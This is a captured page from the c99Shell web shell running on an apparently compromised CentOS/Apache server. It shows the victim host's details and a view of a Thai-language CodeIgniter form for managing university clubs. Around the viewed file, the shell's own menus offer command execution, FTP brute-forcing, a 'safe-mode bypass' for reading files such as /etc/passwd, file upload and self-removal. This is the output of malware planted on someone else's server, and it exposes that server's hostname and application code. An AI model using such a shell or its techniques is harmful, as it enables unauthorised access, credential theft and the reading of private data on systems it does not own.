!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/views/esa/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_club.php (12.61 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<link rel="stylesheet" href="<?=base_url();?>/js/textboxlist_proto/textboxlist.css" type="text/css" media="screen" title="Test Stylesheet" charset="utf-8" />
<script src="<?=base_url();?>/js/textboxlist_proto/protoculous-effects-shrinkvars.js" type="text/javascript" charset="utf-8"></script>
<script src="<?=base_url();?>/js/textboxlist_proto/textboxlist.js" type="text/javascript" charset="utf-8"></script>
<script src="<?=base_url();?>/js/textboxlist_proto/textboxlistauto.js" type="text/javascript" charset="utf-8"></script>

<script type="text/javascript">

document.observe('dom:loaded', function() {
  // init
    tlist1 = new FacebookList('wk11_co', 'wk11_auto');
    var get_user_list_url = "<?=site_url("esa/search/get_ps_list1")?>";        
  // fetch and feed
    new Ajax.Request(get_user_list_url, {
    onSuccess: function(transport) {
        transport.responseText.evalJSON(true).each(function(t){tlist1.autoFeed(t)});
    }
    });
});


Element.addMethods({
    onBoxDispose: function(item,obj) { obj.autoFeed(item.retrieveData('text')); },
    onInputFocus: function(el,obj) { obj.autoShow(); },    
    onInputBlur: function(el,obj) { 
      obj.lastinput = el;
      obj.blurhide = obj.autoHide.bind(obj).delay(0.1);
    },
    filter:function(D,E){var C=[];for(var B=0,A=this.length;B<A;B++){if(D.call(E,this[B],B,this)){C.push(this[B]);}}return C;}
});

function delTe(id,prs_id){
    if(confirm("คุณต้องการลบใช่หรือไม่") == true){
        jQuery("#"+id+"_"+prs_id).remove();
    }
}

function checkForm(){

    if(parseInt(jQuery("#sc_min_member").val())<=0){
        jQuery("#sc_min_member").focus();
        jQuery("#sc_min_member").select();
        alert("จำนวนสมาชิกขั้นต่ำ ต้องมากกว่า 0 !!");
        return false;
    }
    if(parseInt(jQuery("#sc_max_member").val())<=0){
        jQuery("#sc_max_member").focus();
        jQuery("#sc_max_member").select();
        alert("จำนวนสมาชิกสูงสุด ต้องมากกว่า 0 !!");
        return false;
    }
    if(parseInt(jQuery("#sc_min_member").val()) > parseInt(jQuery("#sc_max_member").val())){
        jQuery("#sc_max_member").focus();
        jQuery("#sc_max_member").select();
        alert("จำนวนสมาชิกสูงสุด ต้องมากกว่า จำนวนสมาชิกขั้นต่ำ!!");
        return false;
    }
    if(parseInt(jQuery("#sc_due").val())<0){
        jQuery("#sc_due").focus();
        jQuery("#sc_due").select();
        alert("ค่าสมาชิกชมรม ไม่ถูกต้อง");
        return false;
    }
    
    return true;
}

function findBySmo(){
    var url = "<?php echo site_url($this->config->item('sa_folder'));?>/smo_club/club/";
    jQuery("#myform").attr("action",url);
    jQuery("#myform").trigger("submit");
}
</script>
<table width="80%" align="center">
    <tr>
        <td align="center"><h3>บันทึก/แก้ไขชมรม</h3></td>
    </tr>
    <tr>
        <th align="center" colspan="2"></th>
    </tr>
    <tr>
        <td>
            <?php echo form_open_multipart($this->config->item('sa_folder').'smo_club/add_club', array("name" => "myform""id" => "myform"));?>
                <input type="hidden" name="sc_id" value="<?php echo set_value('sc_id'$qu_cl->sc_id);?>" />
                <input type="hidden" name="cl_code" value="<?php echo getval('sc_id'$qu_cl);?>" />
            <table width="100%"  class='szone2' border="0">

                    <tr>
                        <th>สโมสร</th>
                        <td><?php 
                        $js 
'id="sc_parentId" onChange="findBySmo();"';
                        
$val  = (isset($sc_parentId))? $sc_parentId set_value('sc_parentId',getval('sc_parentId',$qu_cl));
                        echo 
form_dropdown('sc_parentId'$smo$val,$js);?>
                        <span class="error">* <?php echo form_error('sc_parentId'); ?> </span>
                        </td>
                    </tr>
                    <tr>
                        <th>ชื่อชมรม (ไทย) </th>
                        <td><input type="text" name="sc_name" id="sc_name" value="<?php echo set_value('sc_name'$qu_cl->sc_name);?>" size="60" class="required-thai" />
                        <span class="error">* <?php echo form_error('sc_name'); ?>
                        <?php echo isset($error_name)? $error_name "" ?></span></td>
                    </tr>
                    <tr>
                        <th>ชื่อชมรม (อังกฤษ)</th>
                        <td><input type="text" name="sc_name_eng" id="" value="<?php echo set_value('sc_name_eng'$qu_cl->sc_name_eng);?>" size="60" <?php echo form_error('sc_name_eng'); ?>/></td>
                    </tr>
                    <tr>
                        <th>วัตถุประสงค์</th>
                        <td><textarea id="sc_objective" name="sc_objective"  rows="5" cols="60" class=""><?php echo set_value('sc_objective'$qu_cl->sc_objective);?></textarea></td>
                    </tr>
                    <tr>
                        <th>รายละเอียด</th>
                        <td><textarea id="sc_detail" name="sc_detail"  rows="5" cols="60" class=""><?php echo set_value('sc_detail'$qu_cl->sc_detail);?></textarea></td>
                    </tr>
                    <tr>
                        <th>อาจารย์ประจำชมรม <br />(ที่ปรึกษา)</th>
                        <td><input type = "text" value = "" name="wk11_co" id = "wk11_co" />    <!-- 2. textbox's name & id -->
                    <div id = "wk11_auto">                                <!-- 3. div's  id -->
                        <div class = "default">กรุณากรอกชื่ออาจารย์ที่ปรึกษา</div>
                        <ul class = "feed">
                        </ul>
                    </div>
                    <?
                        $id 
getval('sc_id'$qu_cl);
                        if(isset(
$sc_prs) and $sc_prs->num_rows()>0){
                            echo 
"<br />";
                            foreach (
$sc_prs->result() as $prs_row) {
                                echo 
"<div id=\"".$id."_".$prs_row->ads_prs_id."\">".$prs_row->fName." ".$prs_row->lName."<img src=\"".base_url()."/images/delete.png\" class=\"hand\" height=\"12\" width=\"12\" onClick=\"delTe('".$id."','".$prs_row->ads_prs_id."')\"><input type=\"hidden\" name=\"ote[]\" id=\"ote[]\" value=\"".$prs_row->ads_prs_id."\"></div>";
                            }
                        }
                    
?>
                    <?php echo form_error('wk11_co');?></td>
                    </tr>
                    <tr>
                        <th>วันที่ก่อตั้งชมรม</th>
                        <td><input type="text" name="sc_fr_date" id="sc_fr_date" value="<?php echo set_value('sc_fr_date'$qu_cl->sc_fr_date);?>" size="30" /> <span class="error">* <?php echo form_error('sc_fr_date'); ?></span></td>
                    </tr>
                    <tr>
                        <th>จำนวนสมาชิกขั้นต่ำ</th>
                        <td><input type="text" name="sc_min_member" id="sc_min_member" value="<?php echo getval('sc_min_member'$qu_cl);?>" size="4"> คน&nbsp;<span class="error">* <?php echo form_error('sc_min_member'); ?></span></td>
                    </tr>
                    <tr>
                        <th>จำนวนสมาชิกสูงสุด</th>
                        <td><input type="text" name="sc_max_member" id="sc_max_member" value="<?php echo getval('sc_max_member'$qu_cl);?>" size="4"> คน&nbsp;<span class="error">* <?php echo form_error('sc_max_member'); ?></span></td>
                    </tr>
                    <tr>
                        <th>ค่าสมาชิกชมรม</th>
                        <td><input type="text" name="sc_due" id="sc_due" value="<?php echo getval('sc_due'$qu_cl);?>" size="4"> บาท&nbsp;<span class="error">* <?php echo form_error('sc_due'); ?><span class="error"></span></td>
                    </tr>
                    <tr>
                        <th valign="top">ประเภทกิจกรรม</th>
                        <td>

                    <table class="tb_1" >
<?php 
                    $i 
1;
                    foreach (
$rs_veh->result() as $row_veh) {
?>
                    <tr class='szone2' ><td align="left">
                        <input type="checkbox" name="vehicle<?php echo $i?>" value="<?php echo $row_veh->veh_id;?><?php echo ($row_veh->vc_veh_id != '')? 'checked' : (set_value('vehicle'.$i) != '')? 'checked' '';?>/>&nbsp;
                        <?php echo $row_veh->veh_name;?>
                    </td></tr>
<?php
                    $i
++;
                    }
?>
                    </table>
                    <input type="hidden" name="vehicle" value="<?php echo $i?>" />
                    <?php echo isset($ch_vehicle)? $ch_vehicle '' ;?>
                    </td>
                    </tr>
                     <tr>
                        <th>แนบไฟล์</th>
                        <td><input type="hidden" name="ts" value="123"><input type="file" name="fileupload" id="fileupload" size="30" />&nbsp;&nbsp;&nbsp;&nbsp;
                        <?    
                        
if(isset($sc_file) and $sc_file->num_rows()>0){
                            foreach (
$sc_file->result() as $row_file) {
                                echo 
anchor_popup(base_url().$row_file->fup_path,$row_file->fup_file_name);
                            }
                        }
                        
?>
                        <span class="error"><?php
                        
if(isset($error)){
                            echo 
"<br />".$error['error'];
                        }
                        ;
?>
                        </span>
                        </td>
                    </tr>
                    <tr>
                        <td colspan="2" align="center">
                        <input type="hidden" name="persons" id="persons" />
                        <!--<input type="hidden" name="cmt_id" id="cmt_id" value="<?php echo getval('cmt_id',$row_cmt)?>"/>!-->
                        <input type="button" name="add" value="บันทึก" onclick="javascript:do_submit();" /></td>
                    </tr>
            </table>
            <?php echo form_close();?>
            </td>
    </tr>
</table>

<table class='tb_1' width="100%" border="0">
    <tr align="center">
        <th >ลำดับที่</th>
        <th >สโมสร</th>
        <th >ชื่อชมรม(ไทย)</th>
        <th >อาจารย์ประจำชมรม <br />(ที่ปรึกษา)</th>
        <th>จำนวนสมาชิกขั้นต่ำ</th>
        <th>จำนวนสมาชิกสูงสุด</th>
        <th >แนบไฟล์</th>
        <th >แก้ไข</th>
        <th >ลบ</th>
    </tr>
<?php 
if (isset($rs_cl) and $rs_cl->num_rows() > 0) {
    
$index=1;
    foreach (
$rs_cl->result() as $row) {
?>
    <tr>
        <td align="center"><?php echo $index;?></td>
        <td align="center"><?php echo $smo[$row->sc_parentId];?></td>
        <td align="left"><span class="hand" onClick="sendPost('myform_smo', {'sc_id':'<?php echo $row->sc_id?>'}, '<?php echo site_url($this->config->item('sa_folder').'smo_club/detail_club');?>',{})"><?php echo $row->sc_name;?></td>
        <td align="left">
        <?
            
if(isset($arr) and $arr[$row->sc_id]->num_rows>0){
                foreach (
$arr[$row->sc_id]->result() as $prs_row) {
                    echo 
$prs_row->fName." ".$prs_row->lName."<br />";
                }
            }
        
?>
        </td>
        <td align="center"><?php echo $row->sc_min_member;?></td>
        <td align="center"><?php echo $row->sc_max_member;?></td>
        <td align="center">
        <?
        
if(isset($file[$row->sc_id]) and $file[$row->sc_id]->num_rows()>0){
            foreach (
$file[$row->sc_id]->result() as $row_file) {
                
$atts = array("title"=>$row_file->fup_file_name);
                echo 
anchor_popup(base_url().$row_file->fup_path,img($this->config->item('sa_image_clip')),$atts);
            }
        }else{
            echo 
"-";
        }
        
        
//<a href="javascript:void(0)" title="abc">echo img($this->config->item('sa_image_clip'));</a>
     
?>
        </td>
        <td align="center"><span class="hand" onClick="sendPost('myform1', {'sc_id':<?php echo $row->sc_id;?>,'sc_parentId': <?=$row->sc_parentId;?>}, '<?php echo site_url($this->config->item('sa_folder').'smo_club/club');?>')"><?php echo img($this->config->item('sa_image_reply'));?></span></td>
        <td align="center">
        <?if(isset($pm) and $pm[$row->sc_id]=='Y'){?>
        <span class="hand" onClick="if (confirm('ต้องการลบใช่หรือไม่')) { sendPost('hidform5', {'sc_id':<?php echo $row->sc_id;?>,'sc_parentId': <?=$row->sc_parentId;?>},'<?php echo site_url($this->config->item('sa_folder').'smo_club/del_club');?>'); }"><?php echo img($this->config->item('sa_image_del'));?>
        <?}else{
            echo 
img($this->config->item('sa_image_ndel'));
        }
?>
        </td>
    </tr>
<?php 
        $index
++;
    }
} else {
?>
        <tr class='notfound'>
            <td colspan="9" align="center"><?php echo $this->config->item('sa_not_found');?></td>
        </tr>
<?php 
}
?>
</table>
<script language="javascript">
function do_submit(){
    tlist1.update(); 
    document.getElementById('persons').value = $F('wk11_co');
    if(checkForm()!=false){
        document.myform.submit();
    }
    
}
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0141 ]--